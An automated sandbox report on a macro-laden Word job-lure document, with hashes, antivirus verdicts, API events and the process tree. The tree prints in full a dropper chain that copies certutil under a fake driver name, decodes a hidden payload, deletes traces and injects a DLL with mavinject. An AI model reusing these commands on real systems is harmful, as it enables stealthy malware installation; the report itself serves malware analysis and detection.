Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 11, 2021, 2:35 p.m.	May 11, 2021, 2:37 p.m.

Size	1.4MB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 949, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Mar 29 22:22:00 2021, Last Saved Time/Date: Mon Mar 29 22:22:00 2021, Number of Pages: 1, Number of Words: 496, Number of Characters: 2828, Security: 0
MD5	`cb1ae1de9487edd65c2201f1f4a36e3c`
SHA256	`e6dff9a5f74fff3a95e2dcb48b81b05af5cf5be73823d56c10eee80c8f17c845`
CRC32	`B3DDF406`
ssdeep	`24576:O/vPHUEykNi6nmBXEYriYjr6GOb87AKEb73nn1PUu0q6sC8sExvuqH:GvPHUkE6aZI063dU9q6mt`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Microsoft_Office_File_Zero - Microsoft Office File

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" "C:\Users\test22\AppData\Local\Temp\rheinmetall job requirements.doc"
2216
- cmd.exe "C:\Windows\System32\cmd.exe" /c md c:\Drivers
  1204
- cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\Windows\system32\certut*.exe c:\Drivers\DriverUpdateFx.exe
  2932
- cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b c:\Drivers\DriverGFE.tmp+c:\Drivers\DriverGFXCoin.tmp c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverGFE.tmp & del c:\Drivers\DriverGFXCoin.tmp
  3028
- cmd.exe "C:\Windows\System32\cmd.exe" /c c:\Drivers\DriverUpdateFx.exe -decode c:\Drivers\DriverCPHS.tmp c:\Drivers\DriverGFX.tmp & del c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverUpdateFx.exe
  2296
  - DriverUpdateFx.exe c:\Drivers\DriverUpdateFx.exe -decode c:\Drivers\DriverCPHS.tmp c:\Drivers\DriverGFX.tmp
    2316
- cmd.exe "C:\Windows\System32\cmd.exe" /c mavinject.exe 1848 /injectrunning c:\Drivers\DriverGFX.tmp
  1468

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW May 11, 2021, 2:35 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 11, 2021, 2:35 p.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: C:\Windows\system32\certutil.exe console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: c:\Drivers\DriverGFE.tmp console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: c:\Drivers\DriverGFXCoin.tmp console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: (null) console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: (null) console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: (null) console_handle: 0x00000007	1	1
WriteConsoleW May 11, 2021, 2:35 p.m.	buffer: 'mavinject.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c9b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ca05000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74f41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c8d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c4f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c4f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 11, 2021, 2:35 p.m.	process_identifier: 2316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72472000 process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$einmetall job requirements.doc

Creates executable files on the filesystem (1 event)

file	c:\Drivers\DriverUpdateFx.exe

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile May 11, 2021, 2:35 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000198 filepath: C:\Users\test22\AppData\Local\Temp\~$einmetall job requirements.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$einmetall job requirements.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\cmd.exe" /c mavinject.exe 1848 /injectrunning c:\Drivers\DriverGFX.tmp
cmdline	"C:\Windows\System32\cmd.exe" /c md c:\Drivers
cmdline	"C:\Windows\System32\cmd.exe" /c c:\Drivers\DriverUpdateFx.exe -decode c:\Drivers\DriverCPHS.tmp c:\Drivers\DriverGFX.tmp & del c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverUpdateFx.exe
cmdline	"C:\Windows\System32\cmd.exe" /c copy /b C:\Windows\system32\certut*.exe c:\Drivers\DriverUpdateFx.exe
cmdline	"C:\Windows\System32\cmd.exe" /c copy /b c:\Drivers\DriverGFE.tmp+c:\Drivers\DriverGFXCoin.tmp c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverGFE.tmp & del c:\Drivers\DriverGFXCoin.tmp

Word document hooks document open

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c c:\Drivers\DriverUpdateFx.exe -decode c:\Drivers\DriverCPHS.tmp c:\Drivers\DriverGFX.tmp & del c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverUpdateFx.exe
cmdline	"C:\Windows\System32\cmd.exe" /c copy /b c:\Drivers\DriverGFE.tmp+c:\Drivers\DriverGFXCoin.tmp c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverGFE.tmp & del c:\Drivers\DriverGFXCoin.tmp

Deletes executed files from disk (2 events)

file	c:\Drivers\DriverUpdateFx.exe
file	c:\Drivers\DriverCPHS.tmp

Creates suspicious VBA object (1 event)

com_class

Wscript.Shell

May attempt to create new processes

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (5 events)

parent_process	winword.exe	martian_process	"C:\Windows\System32\cmd.exe" /c c:\Drivers\DriverUpdateFx.exe -decode c:\Drivers\DriverCPHS.tmp c:\Drivers\DriverGFX.tmp & del c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverUpdateFx.exe
parent_process	winword.exe	martian_process	"C:\Windows\System32\cmd.exe" /c mavinject.exe 1848 /injectrunning c:\Drivers\DriverGFX.tmp
parent_process	winword.exe	martian_process	"C:\Windows\System32\cmd.exe" /c copy /b C:\Windows\system32\certut*.exe c:\Drivers\DriverUpdateFx.exe
parent_process	winword.exe	martian_process	"C:\Windows\System32\cmd.exe" /c md c:\Drivers
parent_process	winword.exe	martian_process	"C:\Windows\System32\cmd.exe" /c copy /b c:\Drivers\DriverGFE.tmp+c:\Drivers\DriverGFXCoin.tmp c:\Drivers\DriverCPHS.tmp & del c:\Drivers\DriverGFE.tmp & del c:\Drivers\DriverGFXCoin.tmp

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Arcabit	HEUR.VBA.Trojan.d
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of VBA/TrojanDropper.Agent.BYL
TrendMicro-HouseCall	Trojan.W97M.DLOADR.TIOIBENH
Avast	Script:SNH-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	VB.Heur.EmoooDldr.2.C4E0D9B0.Gen
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot	W97M.S.Agent.1517056
MicroWorld-eScan	VB.Heur.EmoooDldr.2.C4E0D9B0.Gen
Tencent	Heur.Macro.Generic.a.2312ce74
Ad-Aware	VB.Heur.EmoooDldr.2.C4E0D9B0.Gen
Emsisoft	VB.Heur.EmoooDldr.2.C4E0D9B0.Gen (B)
Comodo	Malware@#10ip8l7ehracx
DrWeb	Exploit.Siggen3.17088
TrendMicro	Trojan.W97M.DLOADR.TIOIBENH
FireEye	VB.Heur.EmoooDldr.2.C4E0D9B0.Gen
Sophos	Troj/DocDl-ADDU
Ikarus	VB.EmoooDldr
Avira	W97M/YAV.Minerva.ejnvr
Gridinsoft	Trojan.U.Downloader.oa
Microsoft	TrojanDownloader:O97M/Donoff.R!MTB
AegisLab	Trojan.MSWord.Emooo.4!c
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	VB.Heur.EmoooDldr.2.C4E0D9B0.Gen
TACHYON	Suspicious/W97M.Obfus.Gen.2
AhnLab-V3	Dropper/MSOffice.Generic
ALYac	Trojan.Downloader.DOC.Gen
MAX	malware (ai score=100)
Zoner	Probably Heur.W97Obfuscated
Rising	Trojan.[Lazarus]Injector/VBA!1.D5C0 (CLASSIC)
SentinelOne	Static AI - Malicious OLE
Fortinet	VBA/Agent.C4E0!tr
AVG	Script:SNH-gen [Trj]

The process winword.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

rheinmetall job requirements.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All